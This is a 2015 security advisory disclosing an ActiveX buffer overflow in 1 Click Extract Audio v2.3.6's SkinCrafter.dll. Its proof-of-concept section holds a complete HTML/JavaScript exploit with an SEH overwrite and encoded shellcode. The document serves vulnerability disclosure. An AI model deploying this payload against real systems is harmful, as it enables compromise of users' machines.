Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32160
HistoryJun 08, 2015 - 12:00 a.m.

1 Click Extract Audio v2.3.6 - Activex Buffer Overflow

2015-06-0800:00:00
vulners.com
22

Document Title:

1 Click Extract Audio v2.3.6 - Activex Buffer Overflow

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1506

Video: http://www.vulnerability-lab.com/get_content.php?id=1507

Release Date:

2015-06-05

Vulnerability Laboratory ID (VL-ID):

1506

Common Vulnerability Scoring System:

6.1

Product & Service Introduction:

How many times have you watched a video with a fantastic piece of music on it? Wouldn`t it be great if you could make an MP3 file to play on
your computer, or MP3/media player? 1Click Extract Audio is a totally FREE audio extractor, which provides you a handy tool to extract audio/sound
or background music from videos. One handy utility that everyone needs nowadays is a software program that can extract audio, sound, or background
music from home movies, YouTube videos, or any other video file. With just one click, you can easily extract audio tracks from AVI, MPEG, MPG,
FLV (Flash Video), DAT, WMV, MOV, MP4, 3GP video files and save them as MP3, WAV and AC3 formats. It also has the ability to extract audio from
only a portion of the video, instead of the entire file. This is a very basic editing feature, but it’s really helpful because you don’t have to
download any sound editing software if you want only some parts of the audio.

(Copy of the Vendor Homepage: http://www.dvdvideotool.com/extractaudio.htm )

Abstract Advisory Information:

An independent vulnerability laboratory researcher discovered an activex buffer overflow vulnerability in the official 1 Click Extract Audio v2.3.6 software.

Vulnerability Disclosure Timeline:

2015-06-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Affected Product(s):

DVDVideoTool
Product: 1 Click Extract Audio - Software (Windows) 2.3.6

Exploitation Technique:

Local

Severity Level:

High

Technical Details & Description:

An activeX buffer overflow vulnerability has been discovered in the official 1 Click Extract Audio v2.3.6 software.
The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or
to gain higher access privileges for further exploitation.

The buffer overflow vulnerability is located in the COM component used by the product SkinCrafter.dll (dynamic library).
The vulnerability is available with poc demo code and security video to demonstrate how to exploit the issue via activex component.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the
vulnerability results in system compromise by elevation of privileges via overwrite of the registers.

Proof of Concept (PoC):

The activex buffer overflow vulnerability can be exploited by local attackers without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm&lt;/br&gt;
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!–Video Poc: http://bit.ly/1SYwV3u –>
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\xff\xff";
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>

Security Risk:

The security risk of the activex buffer overflow vulnerability is estimated as high. (CVSS 6.1)

Credits & Authors:

metacom (PwC New Zealand) - [http://www.vulnerability-lab.com/show.php?user=metacom]

Disclaimer & Information:

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
([email protected] or [email protected]) to get a permission.

			Copyright Β© 2015 | Vulnerability Laboratory - [Evolution Security GmbH]β„’

– VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: [email protected] PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]&#37;280x198E9928&#37;29.txt